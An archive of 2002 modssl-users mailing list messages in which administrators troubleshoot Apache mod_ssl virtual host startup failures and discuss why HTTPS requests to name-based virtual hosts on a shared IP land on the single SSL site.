	from seraph2.grc.nasa.gov id PAA01770; Fri, 19 Jul 2002 15:25:52 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id F34AAC68FC
	for ; Fri, 19 Jul 2002 09:25:42 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g6JDPgBg014874
	for ; Fri, 19 Jul 2002 09:25:42 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id JAA17540; Fri, 19 Jul 2002 09:26:08 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: RE: SSL w/ Virtual Hosts startup failure...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
	<7BFCE5F1EF28D64198522688F5449D5A844EED@xchangeserver2.storigen.com>
References: 
	<7BFCE5F1EF28D64198522688F5449D5A844EED@xchangeserver2.storigen.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 19 Jul 2002 09:26:08 -0400
Message-Id: <1027085168.3212.461.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well, I added the lines you suggested to the vhost config for the one
that keeps apache from starting.  The vhost-ssl_log file looks like -

# more ssl_log
[19/Jul/2002 09:18:38 13253] [info]  Init: Loading certificate & private
key of SSL-aware server xxx.grc.nasa.gov:443
[19/Jul/2002 09:18:38 13253] [trace] Init: (xxx.grc.nasa.gov:443)
unencrypted RSA private key - pass phrase not required

Doesn't seem to be anything useful there.  And if I comment out this
virtual host (config below) Apache seems to work just fine.  All the
other vhosts startup (http and https).  When I created the configs for
these vhosts, I just copied the directives for each ssl vhost I needed
and changed the paths/certs/hostnames/etc...

Here's the vhost config again -




# Server Info
ServerAdmin sean.m.alderman@grc.nasa.gov
ServerName xxx.grc.nasa.gov

# SSL Stuff
SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/appl/www/xxx.grc.nasa.gov/certs/xxx.crt
SSLCertificateKeyFile /usr/appl/www/xxx.grc.nasa.gov/certs/xxx.key

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
        nokeepalive ssl-unclean-shutdown \
        downgrade-1.0 force-response-1.0
CustomLog /usr/appl/www/xxx/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
SSLLog /usr/appl/www/xxx.grc.nasa.gov/logs/ssl_log
SSLLogLevel debug

# Document Directories
DocumentRoot /usr/appl/www/xxx.grc.nasa.gov/htdocs

  Options +Includes


# Log Configuration
ErrorLog /usr/appl/www/xxx.grc.nasa.gov/logs/error_log
CustomLog "|/usr/appl/apache/bin/rotatelogs
/usr/appl/www/xxx.grc.nasa.gov/logs/access_log 2419200" combined






On Thu, 2002-07-18 at 17:38, Bill Adams wrote:
> You could try adding these directives inside your virtual host block (or else make the scope global if you wish):
> 
>   SSLLog /var/log/httpd/{virtual-host-name}-ssl_log
>   SSLogLevel debug
> 
> These will provide some verbose debug spew in the ssl log file that might help.
> 
> 
> -----Original Message-----
> From: Sean M Alderman [mailto:sean.m.alderman@grc.nasa.gov]
> Sent: Thursday, July 18, 2002 5:21 PM
> To: modssl-users@modssl.org
> Subject: SSL w/ Virtual Hosts startup failure...
> 
> 
> Hi, I just received certs today for a couple of Vhosts.  I setup their
> SSL vhosts like -
> 
> 
> 
> 
> 
> # Server Info
> ServerName www.server.com
> ServerAdmin sean.m.alderman@grc.nasa.gov
> 
> # SSL Stuff
> SSLEngine on
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> SSLCertificateFile /usr/appl/www/www.server.com/certs/server.crt
> SSLCertificateKeyFile /usr/appl/www/www.server.com/certs/server.key
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> CustomLog /usr/appl/www/cws.grc.nasa.gov/logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
> # Document Directory Information
> DocumentRoot /usr/appl/www/www.server.com/htdocs
> 
>   Options +Includes
> 
> 
> # Jakarta Mounts for the
> # Bobby Section 508 software
> JkMount /bobby ajp13
> JkMount /bobby/*.jsp ajp13
> 
> # CGI Directories
> ScriptAlias /cgi-bin/ "/usr/appl/www/www.server.com/cgi-bin/"
> 
> # Log Configuration
> ErrorLog /usr/appl/www/www.server.com/logs/error_log
> CustomLog "|/usr/appl/apache/bin/rotatelogs
> /usr/appl/www/www.server.com/logs/access_log 2419200" combined
> 
> 
> 
> 
> 
> I configured ssl and certs for 3 vhosts and tested each one after I made
> the configuration for it.  The server started after the first ssl
> config, and the second, but it's not starting on the last.  The SSL
> Engine Log is here, access_log and error_log have are empty
> 
> ==> ssl_engine_log <==
> [18/Jul/2002 17:09:30 11938] [info]  Server: Apache/1.3.26, Interface:
> mod_ssl/2.8.9, Library: OpenSSL/0.9.6d
> [18/Jul/2002 17:09:30 11938] [info]  Init: 1st startup round (still not
> detached)
> [18/Jul/2002 17:09:30 11938] [info]  Init: Initializing OpenSSL
> library[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate &
> private key of SSL-aware server xxx.grc.nasa.gov:443
> [18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
> key of SSL-aware server cws.grc.nasa.gov:443
> [18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
> key of SSL-aware server webapp.grc.nasa.gov:443
> [18/Jul/2002 17:09:30 11938] [info]  Init: Seeding PRNG with 136 bytes
> of entropy
> [18/Jul/2002 17:09:30 11938] [info]  Init: Generating temporary RSA
> private keys (512/1024 bits)
> [18/Jul/2002 17:09:31 11938] [info]  Init: Configuring temporary DH
> parameters (512/1024 bits)
> 
> 
> Is there some advanced logging I can do to determine the problem?  Has
> this been handled before (and I didn't use the right search terms)?
> 
> Thanks!
> 
> -- 
> Sean M. Alderman
> ITRACK Systems Analyst
> PACE/NCI - NASA Glenn Research Center
> (216) 433-2795
> 
> Calling a windowed operating system "Windows" is like naming an
> automobile "Wheels."
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 18:22:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA11617; Fri, 19 Jul 2002 18:21:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA11613; Fri, 19 Jul 2002 18:20:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 71F694CE74E; Fri, 19 Jul 2002 18:20:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E32152885B; Fri, 19 Jul 2002 15:46:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id PAA02128; Fri, 19 Jul 2002 15:33:10 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id D815AC6961
	for ; Fri, 19 Jul 2002 09:33:00 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g6JDX0Bg016681
	for ; Fri, 19 Jul 2002 09:33:00 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id JAA17581; Fri, 19 Jul 2002 09:33:26 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: RE: SSL w/ Virtual Hosts startup failure...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: <1027085168.3212.461.camel@salderman.lerc.nasa.gov>
References: 
	<7BFCE5F1EF28D64198522688F5449D5A844EED@xchangeserver2.storigen.com> 
	<1027085168.3212.461.camel@salderman.lerc.nasa.gov>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 19 Jul 2002 09:33:26 -0400
Message-Id: <1027085606.3212.467.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Duh.  I just found a bad path for a log file in the config I put in here
as I read my post.  Fixing that seems to have resolved the issue.  Sorry
for the trouble.

On a side note though, is it considered to be a "best practice" to store
vhost config info in the httpd.conf?  I had thought I might create
config files for each vhost and include them into the main config file,
to make things easier to manage.  Just curious.

On Fri, 2002-07-19 at 09:26, Sean M Alderman wrote:
> Well, I added the lines you suggested to the vhost config for the one
> that keeps apache from starting.  The vhost-ssl_log file looks like -
> 
> # more ssl_log
> [19/Jul/2002 09:18:38 13253] [info]  Init: Loading certificate & private
> key of SSL-aware server xxx.grc.nasa.gov:443
> [19/Jul/2002 09:18:38 13253] [trace] Init: (xxx.grc.nasa.gov:443)
> unencrypted RSA private key - pass phrase not required
> 
> Doesn't seem to be anything useful there.  And if I comment out this
> virtual host (config below) Apache seems to work just fine.  All the
> other vhosts startup (http and https).  When I created the configs for
> these vhosts, I just copied the directives for each ssl vhost I needed
> and changed the paths/certs/hostnames/etc...
> 
> Here's the vhost config again -
> 
> 
> 
> 
> # Server Info
> ServerAdmin sean.m.alderman@grc.nasa.gov
> ServerName xxx.grc.nasa.gov
> 
> # SSL Stuff
> SSLEngine on
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> SSLCertificateFile /usr/appl/www/xxx.grc.nasa.gov/certs/xxx.crt
> SSLCertificateKeyFile /usr/appl/www/xxx.grc.nasa.gov/certs/xxx.key
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
> CustomLog /usr/appl/www/xxx/logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> SSLLog /usr/appl/www/xxx.grc.nasa.gov/logs/ssl_log
> SSLLogLevel debug
> 
> # Document Directories
> DocumentRoot /usr/appl/www/xxx.grc.nasa.gov/htdocs
> 
>   Options +Includes
> 
> 
> # Log Configuration
> ErrorLog /usr/appl/www/xxx.grc.nasa.gov/logs/error_log
> CustomLog "|/usr/appl/apache/bin/rotatelogs
> /usr/appl/www/xxx.grc.nasa.gov/logs/access_log 2419200" combined
> 
> 
> 
> 
> 
> 
> On Thu, 2002-07-18 at 17:38, Bill Adams wrote:
> > You could try adding these directives inside your virtual host block (or else make the scope global if you wish):
> > 
> >   SSLLog /var/log/httpd/{virtual-host-name}-ssl_log
> >   SSLogLevel debug
> > 
> > These will provide some verbose debug spew in the ssl log file that might help.
> > 
> > 
> > -----Original Message-----
> > From: Sean M Alderman [mailto:sean.m.alderman@grc.nasa.gov]
> > Sent: Thursday, July 18, 2002 5:21 PM
> > To: modssl-users@modssl.org
> > Subject: SSL w/ Virtual Hosts startup failure...
> > 
> > 
> > Hi, I just received certs today for a couple of Vhosts.  I setup their
> > SSL vhosts like -
> > 
> > 
> > 
> > 
> > 
> > # Server Info
> > ServerName www.server.com
> > ServerAdmin sean.m.alderman@grc.nasa.gov
> > 
> > # SSL Stuff
> > SSLEngine on
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> > SSLCertificateFile /usr/appl/www/www.server.com/certs/server.crt
> > SSLCertificateKeyFile /usr/appl/www/www.server.com/certs/server.key
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> > CustomLog /usr/appl/www/cws.grc.nasa.gov/logs/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > 
> > # Document Directory Information
> > DocumentRoot /usr/appl/www/www.server.com/htdocs
> > 
> >   Options +Includes
> > 
> > 
> > # Jakarta Mounts for the
> > # Bobby Section 508 software
> > JkMount /bobby ajp13
> > JkMount /bobby/*.jsp ajp13
> > 
> > # CGI Directories
> > ScriptAlias /cgi-bin/ "/usr/appl/www/www.server.com/cgi-bin/"
> > 
> > # Log Configuration
> > ErrorLog /usr/appl/www/www.server.com/logs/error_log
> > CustomLog "|/usr/appl/apache/bin/rotatelogs
> > /usr/appl/www/www.server.com/logs/access_log 2419200" combined
> > 
> > 
> > 
> > 
> > 
> > I configured ssl and certs for 3 vhosts and tested each one after I made
> > the configuration for it.  The server started after the first ssl
> > config, and the second, but it's not starting on the last.  The SSL
> > Engine Log is here, access_log and error_log have are empty
> > 
> > ==> ssl_engine_log <==
> > [18/Jul/2002 17:09:30 11938] [info]  Server: Apache/1.3.26, Interface:
> > mod_ssl/2.8.9, Library: OpenSSL/0.9.6d
> > [18/Jul/2002 17:09:30 11938] [info]  Init: 1st startup round (still not
> > detached)
> > [18/Jul/2002 17:09:30 11938] [info]  Init: Initializing OpenSSL
> > library[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate &
> > private key of SSL-aware server xxx.grc.nasa.gov:443
> > [18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
> > key of SSL-aware server cws.grc.nasa.gov:443
> > [18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
> > key of SSL-aware server webapp.grc.nasa.gov:443
> > [18/Jul/2002 17:09:30 11938] [info]  Init: Seeding PRNG with 136 bytes
> > of entropy
> > [18/Jul/2002 17:09:30 11938] [info]  Init: Generating temporary RSA
> > private keys (512/1024 bits)
> > [18/Jul/2002 17:09:31 11938] [info]  Init: Configuring temporary DH
> > parameters (512/1024 bits)
> > 
> > 
> > Is there some advanced logging I can do to determine the problem?  Has
> > this been handled before (and I didn't use the right search terms)?
> > 
> > Thanks!
> > 
> > -- 
> > Sean M. Alderman
> > ITRACK Systems Analyst
> > PACE/NCI - NASA Glenn Research Center
> > (216) 433-2795
> > 
> > Calling a windowed operating system "Windows" is like naming an
> > automobile "Wheels."
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> -- 
> Sean M. Alderman
> ITRACK Systems Analyst
> PACE/NCI - NASA Glenn Research Center
> (216) 433-2795
> 
> Calling a windowed operating system "Windows" is like naming an
> automobile "Wheels."
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 18:40:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA12852; Fri, 19 Jul 2002 18:39:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lust id SAA12811; Fri, 19 Jul 2002 18:38:44 +0200 (MET DST)
Received: from anners by lust with local (Exim 3.33 #1)
	id 17Vasd-00099r-00
	for modssl-users@modssl.org; Fri, 19 Jul 2002 09:45:23 -0700
Date: Fri, 19 Jul 2002 09:45:23 -0700
From: ann wallace 
To: modssl-users@modssl.org
Subject: Re: virtual host port 443
Message-ID: <20020719094523.C34893@lust.allevil.net>
References: <20020718110535.A17993@lust.allevil.net> <3D380BF4.2070608@sympatico.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3D380BF4.2070608@sympatico.ca>; from theantigod@sympatico.ca on Fri, Jul 19, 2002 at 08:54:12AM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ann wallace 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Amazing words from hunter(theantigod):
:) ann wallace wrote:
:) > im sure this question has been asked before, but i looked around and i
:) > cannot find anything... so here goes, 
:) > 
:) > i have one virtualhost set up to use port 443, but for some reason if you go
:) > to any of the virtualhost set up on port 80, via https it defaults to the
:) > one host set up on port 443.
:) > 
:) > config:
:) > 
:) > Listen 1.2.3.4:80
:) > NameVirtualHost 1.2.3.4:80
:) > 
:) > 
:) >    ServerAdmin blah@blah
:) >    DocumentRoot /home/httpd/html
:) >    ServerName www.blah.blah
:) >    ErrorLog logs/blah-error_log
:) >    TransferLog logs/blah-access_log
:) >    
:) >      AllowOverride AuthConfig
:) >      Options Indexes Includes ExecCGI
:) >      Order allow,deny
:) >      Allow from all
:) >    
:) > 
:) > 
:) > 
:) > 
:) > Listen 1.2.3.4:443
:) > 
:) > 
:) >   ServerAdmin webmaster@otherdomain
:) >   DocumentRoot /www/lotherdomain
:) >   ServerName www.otherdomain.net
:) >   ServerAlias otherdomain.net *.otherdomain.net
:) >   ErrorLog /var/log/httpd/secure-otherdomain-errlog
:) >   TransferLog /var/log/httpd/secure-otherdomain-access_log
:) >   SSLEngine on
:) >   SSLCertificateFile    /etc/httpd/conf/ssl.crt/www.otherdomain.net.crt
:) >   SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www.otherdomain.net.key
:) >   AddType text/html .shtml .html
:) >   AddHandler server-parsed .shtml .html
:) >   
:) >     Options Indexes Includes FollowSymLinks ExecCGI
:) >     AllowOverride AuthConfig
:) >     Order allow,deny
:) >     Allow from all
:) >   
:) > 
:) > 
:) > thanks ann
:) > ______________________________________________________________________
:) > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
:) > User Support Mailing List                      modssl-users@modssl.org
:) > Automated List Manager                            majordomo@modssl.org
:) > 
:) 
:) ann,
:) 
:) Requesting https means 'use port 443'.
:) 
:) That is consistent with your results, though it may not be consistent 
:) with your intent.
:) 
:) I am sorry, but I do not have the experience to know how to achieve what 
:) you want, however I will give the limited insight that I have aquired...
:) 
:) I have been able to specify ports explicitly in the url to override the 
:) http or https, but when left to figure it out my servers (the browsers) 
:) obey the rules.
:) 
:) http = 80
:) https = 443
:) 
:) I have specifically set a server to listen to
:) 
:) http = 1046
:) https = 1047
:) 
:) But, in order to make this work as expected I need to pass the port on 
:) the url.  I have noticed that different browsers behave differently to 
:) not specifying the port.  In some cases typing the url to a server 
:) listening on a non-standard port will result in complete failure (by not 
:) providing the http part)
:) 
:) http://my.domain.org:1046
:) https://my.domain.org:1047
:) 
:) It may be that there is more than one derived valued from the terms, 
:) 'http' and 'https'.
:) 
:) I think (but wait to be corrected) that you must maintain the separation 
:) of function between your secure and non-secure servers so that http and 
:) https behave naturally.
:) 
:) That is ... the server that is listening on port 80 is non-secure and 
:) will respond to requests from 'http' while your server listening on port 
:) 443 will be secure and will respond to requests from 'https'.
:) 
:) However, I don't think this precludes your ability to specify ports and 
:) thus force http or https on different port values.
:) 
:) I do not know if this will help you and I invite someone to correct me 
:) for the benefit of us both.
:) 
:) chris
:) 
:) 

i understand what you are saying and i prob should of phrased my email
differently. i have http/https working fine, but the problem is i only have
1 https client and a lot of http clients. but if someone accidently types
https for an http client it brings up the one https web page. if a client
isn't configured for https and someone tries to use https i would assume you
should get a network error message.

thanks ann
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 18:52:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13475; Fri, 19 Jul 2002 18:50:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from angel.sabetonline.com id SAA13423; Fri, 19 Jul 2002 18:50:04 +0200 (MET DST)
Received: (qmail 21777 invoked by uid 1001); 19 Jul 2002 17:50:26 -0000
Received: from unknown (HELO gateway) (192.168.3.110)
  by 192.168.3.7 with SMTP; 19 Jul 2002 17:50:26 -0000
Date: Fri, 19 Jul 2002 17:50:00 +0100
From: Louis Sabet 
To: modssl-users@modssl.org
Subject: Re: virtual host port 443
In-Reply-To: <20020719094523.C34893@lust.allevil.net>
References: <3D380BF4.2070608@sympatico.ca> <20020719094523.C34893@lust.allevil.net>
Message-Id: <20020719174705.AC75.LOUIS@webtedium.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.08
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louis Sabet 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


On Fri, 19 Jul 2002 09:45:23 -0700
ann wallace  wrote:

> Amazing words from hunter(theantigod):
> :) ann wallace wrote:
> :) > im sure this question has been asked before, but i looked around and i
> :) > cannot find anything... so here goes, 
> :) > 
> :) > i have one virtualhost set up to use port 443, but for some reason if you go
> :) > to any of the virtualhost set up on port 80, via https it defaults to the
> :) > one host set up on port 443.
> :) > 
> :) > config:
> :) > 
> :) > Listen 1.2.3.4:80
> :) > NameVirtualHost 1.2.3.4:80
> :) > 
> :) > 
> :) >    ServerAdmin blah@blah
> :) >    DocumentRoot /home/httpd/html
> :) >    ServerName www.blah.blah
> :) >    ErrorLog logs/blah-error_log
> :) >    TransferLog logs/blah-access_log
> :) >    
> :) >      AllowOverride AuthConfig
> :) >      Options Indexes Includes ExecCGI
> :) >      Order allow,deny
> :) >      Allow from all
> :) >    
> :) > 
> :) > 
> :) > 
> :) > 
> :) > Listen 1.2.3.4:443
> :) > 
> :) > 
> :) >   ServerAdmin webmaster@otherdomain
> :) >   DocumentRoot /www/lotherdomain
> :) >   ServerName www.otherdomain.net
> :) >   ServerAlias otherdomain.net *.otherdomain.net
> :) >   ErrorLog /var/log/httpd/secure-otherdomain-errlog
> :) >   TransferLog /var/log/httpd/secure-otherdomain-access_log
> :) >   SSLEngine on
> :) >   SSLCertificateFile    /etc/httpd/conf/ssl.crt/www.otherdomain.net.crt
> :) >   SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www.otherdomain.net.key
> :) >   AddType text/html .shtml .html
> :) >   AddHandler server-parsed .shtml .html
> :) >   
> :) >     Options Indexes Includes FollowSymLinks ExecCGI
> :) >     AllowOverride AuthConfig
> :) >     Order allow,deny
> :) >     Allow from all
> :) >   
> :) > 
> :) > 
> :) > thanks ann
> :) > ______________________________________________________________________
> :) > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> :) > User Support Mailing List                      modssl-users@modssl.org
> :) > Automated List Manager                            majordomo@modssl.org
> :) > 
> :) 
> :) ann,
> :) 
> :) Requesting https means 'use port 443'.
> :) 
> :) That is consistent with your results, though it may not be consistent 
> :) with your intent.
> :) 
> :) I am sorry, but I do not have the experience to know how to achieve what 
> :) you want, however I will give the limited insight that I have aquired...
> :) 
> :) I have been able to specify ports explicitly in the url to override the 
> :) http or https, but when left to figure it out my servers (the browsers) 
> :) obey the rules.
> :) 
> :) http = 80
> :) https = 443
> :) 
> :) I have specifically set a server to listen to
> :) 
> :) http = 1046
> :) https = 1047
> :) 
> :) But, in order to make this work as expected I need to pass the port on 
> :) the url.  I have noticed that different browsers behave differently to 
> :) not specifying the port.  In some cases typing the url to a server 
> :) listening on a non-standard port will result in complete failure (by not 
> :) providing the http part)
> :) 
> :) http://my.domain.org:1046
> :) https://my.domain.org:1047
> :) 
> :) It may be that there is more than one derived valued from the terms, 
> :) 'http' and 'https'.
> :) 
> :) I think (but wait to be corrected) that you must maintain the separation 
> :) of function between your secure and non-secure servers so that http and 
> :) https behave naturally.
> :) 
> :) That is ... the server that is listening on port 80 is non-secure and 
> :) will respond to requests from 'http' while your server listening on port 
> :) 443 will be secure and will respond to requests from 'https'.
> :) 
> :) However, I don't think this precludes your ability to specify ports and 
> :) thus force http or https on different port values.
> :) 
> :) I do not know if this will help you and I invite someone to correct me 
> :) for the benefit of us both.
> :) 
> :) chris
> :) 
> :) 
> 
> i understand what you are saying and i prob should of phrased my email
> differently. i have http/https working fine, but the problem is i only have
> 1 https client and a lot of http clients. but if someone accidently types
> https for an http client it brings up the one https web page. if a client
> isn't configured for https and someone tries to use https i would assume you
> should get a network error message.
> 
> thanks ann

I assume you are using name based hosts on a single IP for HTTP.

Unfortunately since HTTPS is one-site-per-IP only (rather than virtual
name hosts), it will respond on that IP regardless of the DNS domain
name supplied to it.

There is an unofficial hack which can allow name-based virtual hosts,
but it obviously isn't something you'd want to use in a production
environment.

Regards,

L

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 18:57:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13862; Fri, 19 Jul 2002 18:56:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lust id SAA13837; Fri, 19 Jul 2002 18:55:24 +0200 (MET DST)
Received: from anners by lust with local (Exim 3.33 #1)
	id 17Vb8l-0009Eh-00
	for modssl-users@modssl.org; Fri, 19 Jul 2002 10:02:03 -0700
Date: Fri, 19 Jul 2002 10:02:03 -0700
From: ann wallace 
To: modssl-users@modssl.org
Subject: Re: virtual host port 443
Message-ID: <20020719100203.G34893@lust.allevil.net>
References: <3D380BF4.2070608@sympatico.ca> <20020719094523.C34893@lust.allevil.net> <20020719174705.AC75.LOUIS@webtedium.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20020719174705.AC75.LOUIS@webtedium.com>; from louis@webtedium.com on Fri, Jul 19, 2002 at 05:50:00PM +0100
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ann wallace 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Amazing words from Louis Sabet(louis):
:) > i understand what you are saying and i prob should of phrased my email
:) > differently. i have http/https working fine, but the problem is i only have
:) > 1 https client and a lot of http clients. but if someone accidently types
:) > https for an http client it brings up the one https web page. if a client
:) > isn't configured for https and someone tries to use https i would assume you
:) > should get a network error message.
:) > 
:) > thanks ann
:) 
:) I assume you are using name based hosts on a single IP for HTTP.
:) 
:) Unfortunately since HTTPS is one-site-per-IP only (rather than virtual
:) name hosts), it will respond on that IP regardless of the DNS domain
:) name supplied to it.
:) 
:) There is an unofficial hack which can allow name-based virtual hosts,
:) but it obviously isn't something you'd want to use in a production
:) environment.
:) 
:) Regards,
:) 
:) L
:) 

yea i an using the same ip address. thanks for the info.

cheers..

ann
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 21:40:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA21577; Fri, 19 Jul 2002 21:39:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA21572; Fri, 19 Jul 2002 21:38:59 +0200 (MET DST)
